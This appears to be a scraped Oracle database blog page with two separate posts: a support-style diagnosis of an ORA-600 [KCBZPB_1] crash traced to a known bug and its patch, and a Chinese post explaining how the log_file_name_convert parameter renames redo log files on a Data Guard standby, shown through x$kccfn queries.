Db crashed with ORA-600 [KCBZPB_1] because of corrupted block in memory:

STACK: kcbbxsv kcbbwlru kcbbdrv ksbabs ksbrdp

Bug.5866883/5845232 (36) INSTANCE GOES DOWN DUE TO ORA-600 [KCBZPB_1] V9208:
Bug.5845843/5845232 (96) DATABASE CRASH BY ORA-00600 [2032] , ORA-00600 [KCBZPB_1]

Bug:5845232: Block corruption / errors from concurrent dequeue operations
Tags: AQ CORR/PHY DUMP OERI R9208 REGRESSION SUPERCEEDED
Details:
This problem is introduced in 9.2.0.8 by the fix for bug 4144683.
Concurrent dequeue operations can lead to block corruption
/ memory corruption with varying symptoms such as ORA-600 [6033],
ORA-600 [6101] and ORA-600 [kcoapl_blkchk] if DB_BLOCK_CHECKING is enabled.
The fix for this bug is Patch 6401576.

Bug:6401576 ORA-600 [KTBAIR1] / ORA-600 [KCBZPB_1] / CORRUPTION MESSAGES –> DB CRASH
Abstract: OERI[ktbair1] / ORA-600 [6101] index corruption possible
Fixed-Releases: WIN:9208P22
Tags: CORR/IND OERI
Details:
Note: This fix replaces the fix in bug 5845232.
Certain index operations can lead to block corruption
/ memory corruption with varying symptoms such as ORA-600 [6033],
ORA-600 [6101] , ORA-600 [ktbair1] , ORA-600 [kcbzpb_1],
ORA-600 [4519] and ORA-600 [kcoapl_blkchk] if DB_BLOCK_CHECKING is enabled.

ISSUE CLARIFICATION
====================
Db crashed with ORA-600 [KCBZPB_1]

ISSUE VERIFICATION
===================
alert.log and trace file

CAUSE DETERMINATION
======================
in memory corruption

CAUSE JUSTIFICATION
====================
Bug:6401576 ORA-600 [KTBAIR1] / ORA-600 [KCBZPB_1] / CORRUPTION MESSAGES –> DB CRASH

POTENTIAL SOLUTION(S)
======================
apply patch for Bug:6401576

POTENTIAL SOLUTION JUSTIFICATION(S)
====================================
to fi x the issue

SOLUTION / ACTION PLAN
=======================

Hi,

These errors looks very similar to Bug:6401576 ORA-600 [KTBAIR1] / ORA-600 [KCBZPB_1] / CORRUPTION MESSAGES –> DB CRASH

Please download and apply one-off patch for Bug:6401576 from

Metalink->Patches->patch#=6401576 ->Platform=Hp_UX

Thanks, Rodica

关于参数log_file_name_convert

Oracle文档对于该参数的描述十分容易产生歧义:converts the filename of a new log file on the primary database to the filename of a log file on the standby database,有时被误解为归档日志的文件名转换。

如在某standby备库进行以下测试:

 

alter system set log_file_name_convert='orcl','ZZZZZZ' scope=spfile;

SQL> select fnnam,fnonm from x$kccfn;

FNNAM

--------------------------------------------------------------------------------

FNONM

--------------------------------------------------------------------------------

/u01/oradata/ZZZZZZ/redo03.log

/u01/oradata/orcl/redo03.log

/u01/oradata/ZZZZZZ/redo02.log

/u01/oradata/orcl/redo02.log

/u01/oradata/ZZZZZZ/redo01.log

/u01/oradata/orcl/redo01.log


alter system set log_file_name_convert='orcl','8888888' scope=spfile;

SQL> select fnnam,fnonm from x$kccfn;



FNNAM

--------------------------------------------------------------------------------

FNONM

--------------------------------------------------------------------------------

/u01/oradata/8888888/redo03.log

/u01/oradata/orcl/redo03.log

 /u01/oradata/8888888/redo02.log

/u01/oradata/orcl/redo02.log

/u01/oradata/8888888/redo01.log

/u01/oradata/orcl/redo01.log

v$datafile中的大部分信息来源于x$kccfn内部视图,kccfn意为[F]ile [N]ames来源于Controlfile,其中 fnnam为经过对controlfile中文件名记录转制(由db_file_name_convert或 log_file_name_convert等参数convert)后的记录,而fnonm为控制文件中的原始文件名(或曰文件路径)。若在Data Guard配置过程中遭遇到日志文件名或数据文件名的转制问题,可以通过查询该视图进一步分析。

author: maclean
permanent link:https://www.askmac.cn/2010/05/31/%E5%85%B3%E4%BA%8E%E5%8F%82%E6%95%B0log_file_name_convert/
date:2010-05-31
All rights reserved.

沪ICP备14014813号-2

沪公网安备 31010802001379号